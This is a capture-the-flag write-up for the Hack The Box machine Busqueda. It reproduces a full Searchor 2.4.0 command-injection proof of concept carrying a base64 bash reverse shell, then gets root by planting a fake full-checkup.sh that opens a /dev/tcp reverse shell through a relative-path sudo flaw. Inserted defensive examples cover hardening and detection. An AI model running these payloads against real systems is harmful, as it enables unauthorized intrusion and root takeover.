[HTB] Busqueda


Preface

Next time I'm rating it "Very Easy" again!

Information gathering

nmap

$ sudo nmap -p- --min-rate=10000 10.10.11.208
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 22:34 EDT
Nmap scan report for 10.10.11.208
Host is up (0.075s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 10.09 seconds

$ sudo nmap -sT -sV -sC -O -p22,80 10.10.11.208
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 22:35 EDT
Nmap scan report for 10.10.11.208
Host is up (0.074s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

$ sudo nmap --script=vuln 10.10.11.208
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 22:45 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for searcher.htb (10.10.11.208)
Host is up (0.075s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=searcher.htb
| Found the following possible CSRF vulnerabilities:
|
| Path: http://searcher.htb:80/
| Form id: engine-select
|_ Form action: /search
|_http-dombased-xss: Couldn't find any DOM based XSS.

Nmap done: 1 IP address (1 host up) scanned in 58.20 seconds

Ports 22 and 80 are open, and the IP redirects to http://searcher.htb, so we add that to the hosts file.

whatweb

$ sudo whatweb http://searcher.htb/
http://searcher.htb/ [200 OK] Bootstrap[4.1.3], Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/2.1.2 Python/3.10.6], IP[10.10.11.208], JQuery[3.2.1], Python[3.10.6], Script, Title[Searcher], Werkzeug[2.1.2]

We can see it uses Werkzeug 2.1.2. Werkzeug is a WSGI toolkit that serves as the underlying library for web frameworks. A quick searchsploit turns up "Werkzeug - 'Debug Shell' Command Execution", but running that exploit shows debug mode is not enabled, so it cannot be used here.

nikto

$ sudo nikto -h http://searcher.htb/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.208
+ Target Hostname: searcher.htb
+ Target Port: 80
+ Start Time: 2023-07-18 22:41:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Werkzeug/2.1.2 Python/3.10.6
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ : Server banner changed from 'Werkzeug/2.1.2 Python/3.10.6' to 'Apache/2.4.52 (Ubuntu)'.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS .
+ 7962 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-07-18 22:52:12 (GMT-4) (667 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing useful.

Web penetration

Service identification


Visiting the site, its blurb says it lets you pick a social-media search engine to search more efficiently, or something like that. Whatever; what we really want is the line at the very bottom of the page: Searchor 2.4.0. Straight to Google to see whether there is a usable vulnerability.

Searchor

One search and we find a related PoC on GitHub: Searchor 2.4.0 has an arbitrary command injection vulnerability. So we use it the way the PoC describes.

#!/bin/bash -
# PoC

default_port="9001"
port="${3:-$default_port}"
rev_shell_b64=$(echo -ne "bash -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64)
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"
plus="+"

echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"

if [ -z "${evil_cmd##*$plus*}" ]
then
evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g')
fi

if [ $# -ne 0 ]
then
echo "[*] Input target is $1"
echo "[*] Input attacker is $2:${port}"
echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
curl -s -X POST $1/search -d "engine=Google&query=${evil_cmd}" 1> /dev/null
else
echo "[!] Please specify a IP address of target and IP address/Port of attacker for Reverse Shell, for example:

./exploit.sh <TARGET> <ATTACKER> <PORT> [9001 by default]"
fi
$ ./searchor.sh http://searcher.htb/ <HTB_VPN_IP> <LOCAL_PORT>
---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---
[*] Input target is http://searcher.htb/
[*] Input attacker is <HTB_VPN_IP>:<LOCAL_PORT>
[*] Run the Reverse Shell... Press Ctrl+C after successful connection

Listen locally with nc:

$ sudo nc -lnvp 443
listening on [any] 443 ...
connect to [<HTB_VPN_IP>] from (UNKNOWN) [10.10.11.208] 35470
bash: cannot set terminal process group (1659): Inappropriate ioctl for device
bash: no job control in this shell
svc@busqueda:/var/www/app$

Foothold obtained. The user flag is in svc's home directory.

Privilege escalation

Although the first thing after getting a shell was to look at the flag in the home directory, we have not yet taken a proper look at the /var/www/app directory we landed in.
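To make the bug class concrete from the defender's side, here is an added example (not Searchor's code and not from this writeup) contrasting the injection-prone pattern the PoC above relies on, untrusted text spliced into Python source and handed to eval(), with a hardened form that looks the engine up in an allow-list and passes the query as an ordinary argument. The Engine enum, its URL templates, the two search functions and the marker payload are all constructed stand-ins, not the real library; the marker payload has the same shape as the PoC's (close the quote, finish the call, append an expression, comment out the rest) but only yields a string.

```python
from enum import Enum
from urllib.parse import quote_plus


class Engine(Enum):
    """Constructed stand-in for a search-engine enum; templates are illustrative."""
    Google = "https://www.google.com/search?q={}"
    Bing = "https://www.bing.com/search?q={}"

    def search(self, query: str, copy_url: bool = False, open_web: bool = False) -> str:
        # Build the URL with the query percent-encoded; copy_url/open_web are inert here.
        return self.value.format(quote_plus(query))


def search_unsafe(engine: str, query: str) -> str:
    """Vulnerable pattern (assumed to mirror the bug class, not the real code):
    user-controlled text becomes part of Python source that is evaluated, so a
    query containing a quote can close the string literal and append arbitrary
    expressions, which is exactly what the PoC payload does."""
    return eval(f"Engine.{engine}.search('{query}', copy_url=False, open_web=False)")


def search_safe(engine: str, query: str) -> str:
    """Hardened form: resolve the engine through the enum (an allow-list) and pass
    the query as a normal argument. No source text is built from input, so quotes,
    commas and '#' in the query are just characters to be URL-encoded."""
    try:
        eng = Engine[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    return eng.search(query, copy_url=False, open_web=False)


# Constructed, harmless marker payload: it makes the eval'd expression return the
# string 'INJECTED' instead of the search URL, proving the query controls code flow.
MARKER_PAYLOAD = "',copy_url=False) and 'INJECTED' #"


def demo_search() -> dict:
    """Returns what each implementation produces for the marker payload."""
    return {
        "unsafe": search_unsafe("Google", MARKER_PAYLOAD),
        "safe": search_safe("Google", MARKER_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo_search().items():
        print(f"{name}: {result}")
```

The hardened version also rejects engine names that are not enum members, which closes the other injection point in the same expression (the engine name is spliced into the eval string too). Any web front end that forwards a form field into a library call should be treated like this: parameters, never source text.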

svc@busqueda:/var/www/app$ ls -la
ls -la
total 20
drwxr-xr-x 4 www-data www-data 4096 Apr 3 14:32 .
drwxr-xr-x 4 root root 4096 Apr 4 16:02 ..
-rw-r--r-- 1 www-data www-data 1124 Dec 1 2022 app.py
drwxr-xr-x 8 www-data www-data 4096 Jul 19 03:03 .git
drwxr-xr-x 2 www-data www-data 4096 Dec 1 2022 templates

We notice a .git folder, so we need to look inside it.

svc@busqueda:/var/www/app/.git$ ls -la
ls -la
total 52
drwxr-xr-x 8 www-data www-data 4096 Jul 19 03:03 .
drwxr-xr-x 4 www-data www-data 4096 Apr 3 14:32 ..
drwxr-xr-x 2 www-data www-data 4096 Dec 1 2022 branches
-rw-r--r-- 1 www-data www-data 15 Dec 1 2022 COMMIT_EDITMSG
-rw-r--r-- 1 www-data www-data 294 Dec 1 2022 config
-rw-r--r-- 1 www-data www-data 73 Dec 1 2022 description
-rw-r--r-- 1 www-data www-data 21 Dec 1 2022 HEAD
drwxr-xr-x 2 www-data www-data 4096 Dec 1 2022 hooks
-rw-r--r-- 1 root root 259 Apr 3 15:09 index
drwxr-xr-x 2 www-data www-data 4096 Dec 1 2022 info
drwxr-xr-x 3 www-data www-data 4096 Dec 1 2022 logs
drwxr-xr-x 9 www-data www-data 4096 Dec 1 2022 objects
drwxr-xr-x 5 www-data www-data 4096 Dec 1 2022 refs

Among all these files, which one matters most? The config file, of course; configuration files are usually the most important part.

Let's just take a look.

svc@busqueda:/var/www/app/.git$ cat config
cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://cody:******************@gitea.searcher.htb/cody/Searcher_site.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main

We can see login credentials for a user named cody on the git remote (gitea.searcher.htb). (I have to say, this password really looks like a hash; I spent a while wondering which hash it was, but when I tried it later it turned out to be plaintext......)

We of course hope for credential reuse, so we try logging in with these credentials directly. The login fails, and a look at /etc/passwd shows there is no cody user at all. Could it be svc's password, then? We try it, and indeed it is.
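A credential embedded in a remote URL inside .git/config is a finding worth automating on the defensive side. The following is an added example, not from the writeup, that scans a git config for remotes whose URL carries a userinfo part and produces a redacted copy. The sample config is constructed to match the shape of the one found on the box; the user name and host are from the writeup, while the password is an invented placeholder (the real one is masked on the page).

```python
import re
from urllib.parse import urlsplit

# Constructed sample .git/config; password is a made-up placeholder.
SAMPLE_GIT_CONFIG = """[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
\tlogallrefupdates = true
[remote "origin"]
\turl = http://cody:example-placeholder@gitea.searcher.htb/cody/Searcher_site.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "upstream"]
\turl = git@github.com:example/Searcher_site.git
[branch "main"]
\tremote = origin
\tmerge = refs/heads/main
"""

# git config is INI-like but indented with tabs, which configparser would treat
# as continuation lines, so a small hand-rolled section walker is used instead.
_SECTION = re.compile(r'^\[remote "([^"]+)"\]\s*$')
_URL = re.compile(r'^\s*url\s*=\s*(\S+)\s*$')


def find_embedded_credentials(config_text: str) -> list[dict]:
    """Report every remote whose URL contains userinfo (user or user:password)."""
    findings = []
    remote = None
    for line in config_text.splitlines():
        if line.startswith("["):
            m = _SECTION.match(line)
            remote = m.group(1) if m else None   # non-remote sections are skipped
            continue
        if remote is None:
            continue
        m = _URL.match(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))   # scp-style git@host:path has no scheme, so no userinfo
        if parts.username is not None:
            findings.append({
                "remote": remote,
                "host": parts.hostname,
                "username": parts.username,
                "has_password": parts.password is not None,
            })
    return findings


def redact_credentials(config_text: str) -> str:
    """Return the config with any user[:password]@ in http(s) URLs replaced,
    so the file can be attached to a ticket without leaking the secret."""
    return re.sub(r'(https?://)[^/@\s]+@', r'\1<redacted>@', config_text)


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_GIT_CONFIG):
        print(f"remote {f['remote']}: user {f['username']}@{f['host']} "
              f"(password present: {f['has_password']})")
    print(redact_credentials(SAMPLE_GIT_CONFIG))
```

Run over a checkout tree (for example every .git/config under a web root), this flags exactly the situation exploited here: a deploy clone performed with a URL-embedded password that then sits readable on disk for whoever compromises the web application. The fix on the operations side is a credential helper or deploy key rather than a password in the remote URL, and a rotation of the password that was exposed.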

$ ssh svc@10.10.11.208
svc@10.10.11.208's password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-69-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Jul 19 04:06:19 AM UTC 2023

System load: 0.0185546875
Usage of /: 80.9% of 8.26GB
Memory usage: 59%
Swap usage: 3%
Processes: 238
Users logged in: 0
IPv4 address for br-c954bf22b8b2: 172.20.0.1
IPv4 address for br-cbf2c5ce8e95: 172.19.0.1
IPv4 address for br-fba5a3e31476: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.208


* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.

https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul 19 03:04:01 2023 from 10.10.14.24
svc@busqueda:~$

You may be asking: isn't this going in circles? We are back at svc, so what exactly was escalated? It is not a teleport to the same spot: we now know svc's password, so we can try sudo -l. If there are no sudo rights, then yes, we really are back where we started.

svc@busqueda:~$ sudo -l
[sudo] password for svc:
Matching Defaults entries for svc on busqueda:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *

We find that svc can run /usr/bin/python3 /opt/scripts/system-checkup.py * as root. Let's run it first and see what it does.

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

docker-ps : List running docker containers
docker-inspect : Inpect a certain docker container
full-checkup : Run a full system checkup

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 6 months ago Up About an hour 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 6 months ago Up About an hour 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong

We tried the actions roughly and have no good ideas for now, so let's look at the script's directory first.

svc@busqueda:/opt/scripts$ ls -la
ls -la
total 28
drwxr-xr-x 3 root root 4096 Dec 24 2022 .
drwxr-xr-x 4 root root 4096 Mar 1 10:46 ..
-rwx--x--x 1 root root 586 Dec 24 2022 check-ports.py
-rwx--x--x 1 root root 857 Dec 24 2022 full-checkup.sh
drwxr-x--- 8 root root 4096 Apr 3 15:04 .git
-rwx--x--x 1 root root 3346 Dec 24 2022 install-flask.sh
-rwx--x--x 1 root root 1903 Dec 24 2022 system-checkup.py

In the same directory we also see full-checkup.sh, which has the same name as that action. Could system-checkup.py be calling it to implement the action? If so, the question is: is that call written with a relative path or an absolute one? We of course hope it is not absolute, because then we could either place a forged full-checkup.sh privilege-escalation script earlier in PATH, or create it in some directory and run system-checkup.py from there.

So which is it? Who knows; trying it is the quickest way to find out.

svc@busqueda:~$ echo $PATH
/home/svc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

So we work directly in /home/svc/.local/bin, which covers both cases.
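The relative-versus-absolute question above is the whole privilege-escalation bug, so here is an added example (not the box's system-checkup.py, whose source is not readable by svc and is not reproduced on the page) that shows the bug class and its fix: a helper invoked by a relative path runs whatever file of that name sits in the caller's working directory, while a privileged caller should use an absolute path and check the file before executing it. The directory layout, script names and marker output are constructed for the demonstration, and /bin/sh is assumed to exist.

```python
import stat
import subprocess
import tempfile
from pathlib import Path


def run_checkup_relative(cwd: str) -> str:
    """Vulnerable pattern (assumed to mirror the bug class): the helper is named by
    a relative path, so the file that runs depends on the caller's cwd. Under a
    sudo rule that inherits cwd, the low-privileged caller picks that file."""
    proc = subprocess.run(["/bin/sh", "./full-checkup.sh"], cwd=cwd,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def script_is_trusted(path: Path) -> bool:
    """Checks a privileged caller should make before executing a helper:
    absolute path, regular file, and not writable by group or others."""
    if not path.is_absolute() or not path.is_file():
        return False
    mode = path.stat().st_mode
    return not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def run_checkup_fixed(script: Path) -> str:
    """Hardened form: absolute path, verified before use, and cwd pinned to the
    script's own directory so the caller's environment has no say in it."""
    if not script_is_trusted(script):
        raise PermissionError(f"refusing to run untrusted helper: {script}")
    proc = subprocess.run(["/bin/sh", str(script)], cwd=script.parent,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def demo_checkup() -> dict:
    """Constructed scenario: a trusted script directory and a user-controlled
    directory, each holding its own full-checkup.sh."""
    with tempfile.TemporaryDirectory() as tmp:
        trusted_dir = Path(tmp, "opt_scripts")
        user_dir = Path(tmp, "user_bin")
        trusted_dir.mkdir()
        user_dir.mkdir()
        trusted = trusted_dir / "full-checkup.sh"
        planted = user_dir / "full-checkup.sh"
        trusted.write_text("#!/bin/sh\necho trusted-checkup\n")
        planted.write_text("#!/bin/sh\necho planted-script\n")
        trusted.chmod(0o755)
        planted.chmod(0o777)   # world-writable: a red flag for any privileged caller
        result = {
            "relative_from_trusted_dir": run_checkup_relative(str(trusted_dir)),
            "relative_from_user_dir": run_checkup_relative(str(user_dir)),
            "fixed_path": run_checkup_fixed(trusted),
            "planted_trusted": script_is_trusted(planted),
        }
        try:
            run_checkup_fixed(planted)
            result["planted_refused"] = False
        except PermissionError:
            result["planted_refused"] = True
        return result


if __name__ == "__main__":
    for key, value in demo_checkup().items():
        print(f"{key}: {value}")
```

The "Something went wrong" seen when running full-checkup from the home directory is consistent with the relative-path variant: there was no ./full-checkup.sh in that cwd, so the call failed. Beyond fixing the script, the sudoers rule itself is the other lever: a trailing * on a command that dispatches to other programs is what turns a single helper into a root shell, and an ownership-and-mode check like script_is_trusted would have refused the planted copy even if the path were still relative.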

svc@busqueda:~/.local/bin$ vim full-checkup.sh
svc@busqueda:~/.local/bin$ chmod +x full-checkup.sh
svc@busqueda:~/.local/bin$ ll
total 24
drwxrwxr-x 2 svc svc 4096 Jul 19 04:14 ./
drwxrwxr-x 5 svc svc 4096 Jun 15 2022 ../
-rwxrwxr-x 1 svc svc 208 Jun 15 2022 flask*
-rwxrwxr-x 1 svc svc 60 Jul 19 04:14 full-checkup.sh*
-rwxrwxr-x 1 svc svc 211 Jun 15 2022 pyjwt*
svc@busqueda:~/.local/bin$ cat full-checkup.sh
#!/bin/bash

/bin/bash -i >& /dev/tcp/<HTB_VPN_IP>/8080 0>&1
svc@busqueda:~/.local/bin$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

Listen locally with nc:

$ sudo nc -nlvp 8080
listening on [any] 8080 ...
connect to [<HTB_VPN_IP>] from (UNKNOWN) [10.10.11.208] 53532
root@busqueda:/home/svc/.local/bin# cd /root
cd /root
root@busqueda:~# ls -la
ls -la
total 60
drwx------ 9 root root 4096 Apr 3 16:01 .
drwxr-xr-x 19 root root 4096 Mar 1 10:46 ..
lrwxrwxrwx 1 root root 9 Feb 20 12:09 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 3 root root 4096 Mar 1 10:46 .cache
drwx------ 3 root root 4096 Mar 1 10:46 .config
-rw-r----- 1 root root 430 Apr 3 15:13 ecosystem.config.js
-rw-r--r-- 1 root root 104 Apr 3 08:58 .gitconfig
drwxr-xr-x 3 root root 4096 Mar 1 10:46 .local
-rw------- 1 root root 50 Feb 20 12:04 .my.cnf
lrwxrwxrwx 1 root root 9 Feb 20 12:12 .mysql_history -> /dev/null
drwxr-xr-x 4 root root 4096 Mar 1 10:46 .npm
drwxr-xr-x 5 root root 4096 Jul 19 03:03 .pm2
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r----- 1 root root 33 Jul 19 03:03 root.txt
drwxr-xr-x 4 root root 4096 Apr 3 16:01 scripts
drwx------ 3 root root 4096 Mar 1 10:46 snap
root@busqueda:~# cat root.txt

Rooted, just as we expected.